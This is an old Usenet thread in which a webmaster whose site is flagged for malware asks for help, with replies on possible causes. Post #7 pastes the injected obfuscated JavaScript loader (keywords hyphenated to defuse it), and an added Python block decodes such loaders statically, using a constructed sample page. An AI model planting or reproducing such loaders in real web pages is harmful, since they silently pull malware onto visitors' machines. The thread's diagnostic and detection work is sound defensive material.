Web site compromised?

Discussion in 'Computer Security' started by Kompu Kid, Apr 22, 2009.

  1. Kompu Kid

    Kompu Kid Guest

    Hello All:

    A website I manage seems to have a problem when I tried to access it
    today with Chrome browser.

    Chrome gives the following warning:


    "Warning: Visiting this site may harm your computer!
    The website at www.XXXX.YYY (I am not giving the actual URL) contains
    elements from the site beebest.cn, which appears to host malware –
    software that can hurt your computer or otherwise operate without your
    consent. Just visiting a site that contains malware can infect your
    computer.
    For detailed information about the problems with these elements, visit
    the Google Safe Browsing diagnostic page for beebest.cn.
    Learn more about how to protect yourself from harmful software online.
    I understand that visiting this site may harm my computer. "

    How can "elements" from beebest.cn be on this site? What do
    "elements" mean in this case?

    I am downloading the site and will do a text search for "beebest" .

    Any other recommendations?

    Thanks

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #1

  2. Kompu Kid

    Kompu Kid Guest

    On Apr 22, 12:46 am, Kompu Kid <> wrote:
    > Hello All:
    >
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Chrome gives the following warning:
    >
    > "Warning: Visiting this site may harm your computer!
    > The website at www.XXXX.YYY (I am not giving the actual URL) contains
    > elements from the site beebest.cn, which appears to host malware –
    > software that can hurt your computer or otherwise operate without your
    > consent. Just visiting a site that contains malware can infect your
    > computer.
    > For detailed information about the problems with these elements, visit
    > the Google Safe Browsing diagnostic page for beebest.cn.
    > Learn more about how to protect yourself from harmful software online.
    >  I understand that visiting this site may harm my computer.  "
    >
    > How can "elements" from beebest.cn be on this site? What do
    > "elements" mean in this case?
    >
    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >
    > Thanks
    >
    > Deguza


    I just had a friend try to access my website. He got the same message
    except the beebest.cn was replaced by www.corpamata.cn.

    What is going on?

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #2

  3. Kompu Kid

    Martin Guest

    Kompu Kid wrote:
    > On Apr 22, 12:46 am, Kompu Kid <> wrote:
    >> Hello All:
    >>
    >> A website I manage seems to have a problem when I tried to access it
    >> today with Chrome browser.
    >>
    >> Chrome gives the following warning:
    >>
    >> "Warning: Visiting this site may harm your computer!
    >> The website at www.XXXX.YYY (I am not giving the actual URL) contains
    >> elements from the site beebest.cn, which appears to host malware –
    >> software that can hurt your computer or otherwise operate without your
    >> consent. Just visiting a site that contains malware can infect your
    >> computer.
    >> For detailed information about the problems with these elements, visit
    >> the Google Safe Browsing diagnostic page for beebest.cn.
    >> Learn more about how to protect yourself from harmful software online.
    >> I understand that visiting this site may harm my computer. "
    >>
    >> How can "elements" from beebest.cn be on this site? What do
    >> "elements" mean in this case?
    >>
    >> I am downloading the site and will do a text search for "beebest" .
    >>
    >> Any other recommendations?
    >>
    >> Thanks
    >>
    >> Deguza

    >
    > I just had a friend try to access my website. He got the same message
    > except the beebest.cn was replaced by www.corpamata.cn.
    >
    > What is going on?


    Dunno, but if it were my site I'd be looking to sack the webmaster
    because he doesn't seem to know what he's doing.

    Post the frigging site and you might get a decent answer from someone
    who bothers to go and look at the code.
    >
    > Deguza
    >
     
    Martin, Apr 22, 2009
    #3
  4. Kompu Kid

    Kompu Kid Guest

    On Apr 22, 1:28 am, Martin <> wrote:
    > Kompu Kid wrote:
    > > On Apr 22, 12:46 am, Kompu Kid <> wrote:
    > >> Hello All:

    >
    > >> A website I manage seems to have a problem when I tried to access it
    > >> today with Chrome browser.

    >
    > >> Chrome gives the following warning:

    >
    > >> "Warning: Visiting this site may harm your computer!
    > >> The website at www.XXXX.YYY (I am not giving the actual URL) contains
    > >> elements from the site beebest.cn, which appears to host malware –
    > >> software that can hurt your computer or otherwise operate without your
    > >> consent. Just visiting a site that contains malware can infect your
    > >> computer.
    > >> For detailed information about the problems with these elements, visit
    > >> the Google Safe Browsing diagnostic page for beebest.cn.
    > >> Learn more about how to protect yourself from harmful software online.
    > >>  I understand that visiting this site may harm my computer.  "

    >
    > >> How can "elements" from beebest.cn be on this site? What do
    > >> "elements" mean in this case?

    >
    > >> I am downloading the site and will do a text search for "beebest" .

    >
    > >> Any other recommendations?

    >
    > >> Thanks

    >
    > >> Deguza

    >
    > > I just had a friend try to access my website. He got the same message
    > > except the beebest.cn was replaced by www.corpamata.cn.

    >
    > > What is going on?

    >
    > Dunno, but if it were my site I'd be looking to sack the webmaster
    > because he doesn't seem to know what he's doing.
    >
    > Post the frigging site and you might get a decent answer from someone
    > who bothers to go and look at the code.
    >
    >
    >
    > > Deguza


    These guys are complaining about the same thing. However, some are
    finding no problems...

    http://www.greenockmorton.org/forum/index.php?showtopic=26972

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #4
  5. Kompu Kid

    1PW Guest

    On 04/22/2009 12:46 AM, Kompu Kid sent:
    > Hello All:
    >
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Chrome gives the following warning:
    >
    >
    > "Warning: Visiting this site may harm your computer!
    > The website at www.XXXX.YYY (I am not giving the actual URL) contains
    > elements from the site beebest.cn, which appears to host malware –
    > software that can hurt your computer or otherwise operate without your
    > consent. Just visiting a site that contains malware can infect your
    > computer.
    > For detailed information about the problems with these elements, visit
    > the Google Safe Browsing diagnostic page for beebest.cn.
    > Learn more about how to protect yourself from harmful software online.
    > I understand that visiting this site may harm my computer. "
    >
    > How can "elements" from beebest.cn be on this site? What do
    > "elements" mean in this case?
    >
    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >
    > Thanks
    >
    > Deguza


    Hello Deguza:

    I too believe we should be dealing with specifics. Please reply with
    your site's true and complete URL in the form of:

    <hxxp://www.xxxx.yyy/>
      ^^

    In the meantime, you may wish to see if your application software is
    updated to the latest possible versions so as to have all possible
    security holes plugged. If you also manage the website's OS please post
    a great deal of detail on its state of revision. It wouldn't hurt to
    give us the ISP so we don't have to dig for it. Do you also maintain
    its hardware?

    Warm regards,

    Pete
    --
    1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]
     
    1PW, Apr 22, 2009
    #5
  6. Kompu Kid

    John Holmes Guest

    Kompu Kid "contributed" in alt.hacker:

    > (I am not giving the actual URL)


    Don't expect any help then.

    --
    <snip>
     
    John Holmes, Apr 22, 2009
    #6
  7. Kompu Kid

    Kompu Kid Guest

    On Apr 22, 2:21 pm, "erewhon" <> wrote:
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Does it use SQL queries. If so, likely malware was inserted via SQL
    > injection


    No, it does not use SQL queries.

    I found this in one of the pages. I have not put this in there, unless
    FrontPage, or the webhosting software put it in.

    Or it could be the infection (I am putting "-"s in some of the key
    words just in case it tries to execute on the web...):

    <s-c-ript la-ngu-age=ja-va-script><!--
    do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
    %2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
    %3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
    ii/g,""));
    --></script><body>
     
    Kompu Kid, Apr 22, 2009
    #7
  8. Kompu Kid

    Kompu Kid Guest

    On Apr 22, 9:22 am, John Holmes <> wrote:
    > Kompu Kid "contributed" in alt.hacker:
    >
    > > (I am not giving the actual URL)

    >
    > Don't expect any help then.
    >
    > --
    > <snip>


    I did not want anybody getting infected, that's why I did not give it
    out.

    Deguza
     
    Kompu Kid, Apr 23, 2009
    #8
  9. Kompu Kid

    Todd H. Guest

    Todd H., Apr 23, 2009
    #9
  10. Kompu Kid <> contributed wisdom to news:f1923657-9ee8-
    :

    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >


    Do you have any dynamic content?
    Do you run banner ads that are not on your machine but are links to another
    machine?
    Do you include google keyword advertising?
    Do you have a link to a webring at the bottom of the webpage?

    Gandalf Parker
     
    Gandalf Parker, Apr 23, 2009
    #10
  11. Kompu Kid

    Kompu Kid Guest

    UPDATE:

    * I found also a My hosting services told me that an infection on my
    personal computer is probably where the injection of suspect codes
    have started. He says the virus on my computer used the ftp link I
    have to the web hosting site.

    * In addition to the script I gave earlier, I found on some pages
    another piece of code that had an "iframe" html command. The iframe
    was referring to a Chinese site "betwager". I am not able to write the
    full code and the site. Google won't let me post it.
     
    Kompu Kid, Apr 23, 2009
    #11
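Added example (not from any poster in this thread): a static check over a downloaded copy of the site for the two injection styles described in posts #7 and #11, a `document.write(unescape(...).replace(...))` loader and an `iframe` pointing at a foreign host. It also shows why a plain text search for the domain named in the browser warning can come up empty. The sample page, the `example.invalid` hosts and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlparse

# document.write(unescape('<payload>').replace(/<junk|junk>/g, ""))
WRITE_UNESCAPE = re.compile(
    r"""document\.write\(\s*unescape\(\s*(['"])(?P<payload>.*?)\1\s*\)"""
    r"""(?:\s*\.replace\(\s*/(?P<junk>[^/]+)/g\s*,\s*(['"])\4\s*\))?""",
    re.IGNORECASE | re.DOTALL,
)
# src attribute of <script> / <iframe>, quoted or unquoted
SRC_ATTR = re.compile(
    r"""<(script|iframe)\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)

def decode_writes(html):
    """Statically undo each loader call; nothing is executed."""
    decoded = []
    for m in WRITE_UNESCAPE.finditer(html):
        # Raw whitespace inside the payload is only line wrapping.
        text = unquote(re.sub(r"\s+", "", m.group("payload")))
        if m.group("junk"):
            # The junk tokens are removed after percent-decoding, as in the JS.
            junk = re.sub(r"\s+", "", m.group("junk")).split("|")
            text = re.sub("|".join(re.escape(t) for t in junk if t), "", text)
        decoded.append(text)
    return decoded

def external_refs(markup, own_hosts):
    """(tag, host) for every script/iframe src that names a host we do not own."""
    refs = []
    for tag, src in SRC_ATTR.findall(markup):
        host = (urlparse(src).hostname or "").lower()
        if host and host not in own_hosts:
            refs.append((tag.lower(), host))
    return refs

def scan(html, own_hosts):
    """Report foreign hosts referenced in the clear and inside decoded loaders."""
    findings = [("plain", t, h) for t, h in external_refs(html, own_hosts)]
    for decoded in decode_writes(html):
        findings += [("obfuscated", t, h)
                     for t, h in external_refs(decoded, own_hosts)]
    return findings

# Constructed sample page: same structure as the reported injections,
# with placeholder hosts under the reserved .invalid TLD.
SAMPLE = """<html><head><script src="js/menu.js"></script>
<script language=javascript><!--
document.write(unescape('qQ%3CscrZxipt%20sZxrc%3D%2F%2Finjected%2EeqQxample%2Einvalid%2Fa%2Ejs%3E%3C%2FscriptZx%3E').replace(/Zx|qQ/g,""));
--></script><body>
<iframe src="http://frame.example.invalid/in.html" width=1 height=1></iframe>
</body></html>"""

if __name__ == "__main__":
    # The injected host never appears literally, so grep for it finds nothing.
    print("literal match:", "injected.example.invalid" in SAMPLE)
    for kind, tag, host in scan(SAMPLE, {"www.example.invalid"}):
        print(kind, tag, host)
```

Run it over every HTML, JS and template file in the downloaded copy; any host it reports that is not one the site intentionally loads from marks a file to restore from a known-good backup.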
  12. Kompu Kid

    Kompu Kid Guest

    On Apr 23, 4:03 pm, "David H. Lipman" <DLipman~>
    wrote:
    > From: "Kompu Kid" <>
    >
    > | UPDATE:
    >
    > | * I found also a My hosting services told me that an infection on my
    > | personal computer is probably where the injection of suspect codes
    > | have started. He says the virus on my computer used the ftp link I
    > | have to the web hosting site.
    >
    > | * In addition to the script I gave earlier, I found on some pages
    > | another piece of code that had an "iframe" html command. The iframe
    > | was referring to a chinese site "betwager". I am not able to write the
    > | full code and the site. Google won't let me post it.
    >
    > Don't use Google !
    >
    > news://nntp.aioe.org/alt.computer.security
    > Cross-Posted to the other groups.
    >
    > As for your hosting company, they could be wrong are just passing the blame to you.
    > Chances are MORE likely that you use an application on the server with vulnerabilities and
    > malicious actors have exploited them to add malicious code to your site.
    >
    > --
    > Dave http://www.claymania.com/removal-trojan-adware.html
    > Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


    It seems like I need to install a newsreader on my computer to use the
    "news://nntp.aioe.org/alt.computer.security ".

    Outlook volunteered when I put that in my Chrome's address area, but
    I do not want to use it.

    Any recommendations for a news reader for the XP environment? If it
    matters, I use Firefox in addition to Chrome.

    Deguza
     
    Kompu Kid, Apr 24, 2009
    #12
  13. Kompu Kid

    Todd H. Guest

    "David H. Lipman" <DLipman~nospam~@Verizon.Net> writes:

    > From: "Kompu Kid" <>
    >
    >
    >
    > | UPDATE:
    >
    > | * I found also a My hosting services told me that an infection on my
    > | personal computer is probably where the injection of suspect codes
    > | have started. He says the virus on my computer used the ftp link I
    > | have to the web hosting site.
    >
    > | * In addition to the script I gave earlier, I found on some pages
    > | another piece of code that had an "iframe" html command. The iframe
    > | was referring to a chinese site "betwager". I am not able to write the
    > | full code and the site. Google won't let me post it.
    > Cross-Posted to the other groups.
    >
    > As for your hosting company, they could be wrong are just passing the blame to you.
    > Chances are MORE likely that you use an application on the server with vulnerabilities and
    > malicious actors have exploited them to add malicious code to your site.


    Much agreed. PHP is so porous that it's much more likely to be a
    direct attack on your site rather than some convoluted "trojan on your
    computer that modifies local html and then magically knows what FTP
    client you're using, reuses its cached password for the site and loads
    the modified html onto the remote site."

    The target audience for such a client side sploit is so small it
    wouldn't be worthwhile.

    visit http://www.securityfocus.com/vulnerabilities

    and for each of the following, chase down what vulns there are for it
    for the version of each your site is running

    Web server version (apache whatever likely)
    php version on the server
    what php forum script you're using / version


    And see what vulns are in each for the versions you have, and that'll
    whittle down the "how" in what happened perhaps.


    --
    Todd H.
    http://www.toddh.net/
     
    Todd H., Apr 24, 2009
    #13
  14. Kompu Kid

    ©Ari® Guest

    On Thu, 23 Apr 2009 15:11:49 -0700 (PDT), Kompu Kid wrote:

    > * I found also a My hosting services told me that an infection on my
    > personal computer is probably where the injection of suspect codes
    > have started. He says the virus on my computer used the ftp link I
    > have to the web hosting site.


    LOL
    --
    A fireside chat not with Ari!
    http://tr.im/holj
    Motto: Live To Spooge It!
     
    ©Ari®, Apr 24, 2009
    #14
  15. Kompu Kid

    DGB Guest

    ©Ari® wrote:
    > On Thu, 23 Apr 2009 15:11:49 -0700 (PDT), Kompu Kid wrote:
    >
    >> * I found also a My hosting services told me that an infection on my
    >> personal computer is probably where the injection of suspect codes
    >> have started. He says the virus on my computer used the ftp link I
    >> have to the web hosting site.

    >
    > LOL


    Can you/will you expand on your comment, ©Ari® ?

    Thanks
     
    DGB, Apr 24, 2009
    #15
  16. Kompu Kid

    Doc Guest

    Kompu Kid <> wrote in news:da2c3ba5-46fc-4b8d-a28f-
    :

    > On Apr 22, 9:22 am, John Holmes <> wrote:
    >> Kompu Kid "contributed" in alt.hacker:
    >>
    >> > (I am not giving the actual URL)

    >>
    >> Don't expect any help then.
    >>
    >> --
    >> <snip>

    >
    > I did not want anybody getting infected, that's why I did not give it
    > out.


    If you're posting a message in a hacker forum with a warning that you
    think the site might be compromised, then the people who look at it are
    forewarned.

    Not posting the URL is stupid. People who can do low-tech stuff like
    telnet to the server and download the page for analysis can't do that if
    they don't know where it is.

    It's like telling someone you think you have an STD, but not going to the
    doctor to really find out.



    Doc.

    --
    The bigger the humbug, the better people will like it.
    - Phineas Taylor Barnum.
     
    Doc, Apr 24, 2009
    #16
  17. Kompu Kid

    Doc Guest

    Kompu Kid <> wrote in
    news::

    <snip>

    > Any recommendations for a news reader for the XP environment? If it
    > matters, I use Firefox in addition to chrome.


    I still like X-News.

    http://download.cnet.com/Xnews/3000-2164_4-10026377.html

    Really should download and try the latest version, but the one I have just
    works - no attempts to execute code or render pages, so very safe.


    Doc.

    --
    The bigger the humbug, the better people will like it.
    - Phineas Taylor Barnum.
     
    Doc, Apr 24, 2009
    #17
  18. Kompu Kid

    John Holmes Guest

    Kompu Kid "contributed" in alt.hacker:

    > On Apr 22, 9:22 am, John Holmes <> wrote:
    >> Kompu Kid "contributed" in alt.hacker:
    >>
    >> > (I am not giving the actual URL)

    >>
    >> Don't expect any help then.
    >>
    >> --
    >> <snip>

    >
    > I did not want anybody getting infected, that's why I did not give it
    > out.
    >
    > Deguza


    I'll second Doc.

    Most of the regulars here know what they're doing. FYI, my system will
    not get infected by just browsing to a compromised website.

    --
    <snip>
     
    John Holmes, Apr 25, 2009
    #18
  19. Kompu Kid

    ~BD~ Guest

    John Holmes wrote:

    > I'll second Doc.
    >
    > Most of the regulars here know what they're doing. FYI, my system will
    > not get infected by just browsing to a compromised website.
    >


    Hello John :)

    Please will you explain how/why *your* system will not be so infected
    yet other folk may be?

    Might it simply be because you aren't using Microsoft Windows?

    --
    Dave
     
    ~BD~, Apr 25, 2009
    #19
  20. Kompu Kid

    John Holmes Guest

    ~BD~ "contributed" in alt.hacker:

    > John Holmes wrote:
    >
    >> I'll second Doc.
    >>
    >> Most of the regulars here know what they're doing. FYI, my system will
    >> not get infected by just browsing to a compromised website.
    >>

    >
    > Hello John :)
    >
    > Please will you explain how/why *your* system will not be so infected
    > yet other folk may be?
    >
    > Might it simply be because you aren't using Microsoft Windows?
    >
    > --
    > Dave
    >


    As a matter of fact, I'm using WinXP for my daily use. My 5 workstations
    and 4 wireless laptops (some XP, some Slackware) are all behind 2 Windows
    2008 DC's running ISA server and Forefront. That setup keeps my local
    network free of mal/spy-ware, viruses and other nasties. The servers are
    really in use as servers, i.e. nobody touches them but me and no websites
    are ever visited on them.

    I hope my answer satisfied you.

    --
    <snip>
     
    John Holmes, Apr 25, 2009
    #20